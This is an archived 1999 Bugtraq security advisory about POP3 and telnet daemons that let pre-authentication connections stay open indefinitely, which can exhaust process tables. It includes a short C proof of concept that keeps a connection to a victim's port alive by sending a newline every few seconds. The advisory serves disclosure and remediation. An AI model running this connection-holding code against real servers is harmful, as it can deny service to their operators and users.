kki.inactive.connections.txt

1999-08-17T00:00:00
ID PACKETSTORM:12027
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `Date: Wed, 28 Apr 1999 13:59:28 +0200  
From: Lukasz Luzar <lluzar@SECURITY.KKI.PL>  
To: BUGTRAQ@netspace.org  
Subject: KKIS.28041999.002.b  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
### ### ### ### ###  
### ### ### ### ###  
###### ###### ###  
### ### ### ### ###  
### ### ### ### ###  
  
S E C U R I T Y  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
KKI Security Team Cracow Commercial Internet  
http://www.security.kki.pl http://www.kki.pl  
mailto:security@security.kki.pl mailto:biuro@kki.pl  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Raport title : Flaws in implementations of mechanisms which  
prevents from maintaining the parasitize connections  
in many tcp network services.  
Problem found by : Lukasz Luzar (lluzar@security.kki.pl)  
Raport created by : Robert Pajak (shadow@security.kki.pl)  
Lukasz Luzar (lluzar@security.kki.pl)  
Raport published : 28 April 1999  
Raport code : KKIS.28041999.002.b  
Vulnerable programs : qpopper, in.pop3, cucipop, telnetd, ...  
Systems affected : Linux, FreeBSD, Solaris, ...  
Archive : http://www.security.kki.pl/advisories/  
Risk level : low  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
The designers of many popular network services are trying to make the  
mechanisms which should prevents from maintaining the parasitize connections  
to their programs.  
The exercise of such protection is timeout, which closes inactive  
connections.  
But some of those designers forgets that some malicious guys may often  
and fraquently send strings full of bad or null commands to the open port  
of the service. Such situation might happen before login/password  
authentication of the connection.  
Those programmers should implement additional mechanisms to prevent such  
situations. Good solution is to put counter of bad (or null) commands  
inside the program.  
  
For example, the similiar mechanism has been applied in sendmail.  
This soluition is effective and very easy to implement.  
  
Lack of this mechanism may be quite threateing, because most of that tcp  
services are working with root privilages, and the bounds of amount of root  
proceses isn't easy, when the service has no internal bound.  
That affects whole system, when proccess table is fulfiled for  
example by multiply open connections to the vulnerable tcp service.  
  
Worst situation is, when vulnerable service doesn't logs any information  
about connection before authentication with login/password.  
One of this most vulnerable services is cucipop.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Below example shows how to open and maintain the connection,  
which might state open by undefined time.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
--- CUT HERE ---  
/*  
* example.c by Lukasz Luzar (lluzar@security.kki.pl)  
*/  
  
#include <stdio.h>  
#include <unistd.h>  
#include <string.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <netinet/in.h>  
#include <arpa/inet.h>  
  
/* victim's address and port of service */  
#define ADDR "10.0.0.1" //IP in dot natation  
#define PORT 110 //e.g. some pop3  
#define DELAY 4 //(4 secs.) how often we are sending bad commands  
#define COMMAND "\n" //some bad (or null) command  
  
void main()  
{  
int sockfd,  
j,k;  
struct sockaddr_in victim_addr;  
  
bzero((char *) &victim_addr, sizeof( victim_addr));  
  
victim_addr.sin_family = AF_INET;  
victim_addr.sin_addr.s_addr = inet_addr( ADDR);  
victim_addr.sin_port = htons( PORT);  
  
if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0)  
fprintf( stderr, "socket error\n");  
  
if( connect( sockfd,(struct sockaddr*) &victim_addr,  
sizeof( victim_addr)) < 0)  
fprintf( stderr,"connect error\n");  
  
k = 1;  
if( setsockopt( sockfd,IPPROTO_TCP,TCP_NODELAY,&k,sizeof( k)) != 0)  
fprintf( stderr,"setsockopt error\n");  
  
j = strlen( COMMAND);  
  
for(;;) {  
if( write( sockfd,COMMAND,j) == -1)  
fprintf( stderr,"write error\n");  
fprintf( stderr,".");  
sleep( DELAY);  
}  
  
}  
--- CUT HERE ---  
  
~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Copyright (c) 1999 KKI Security Team, Poland  
All rights reserved.  
  
All questions please address to mailto:security@security.kki.pl  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
`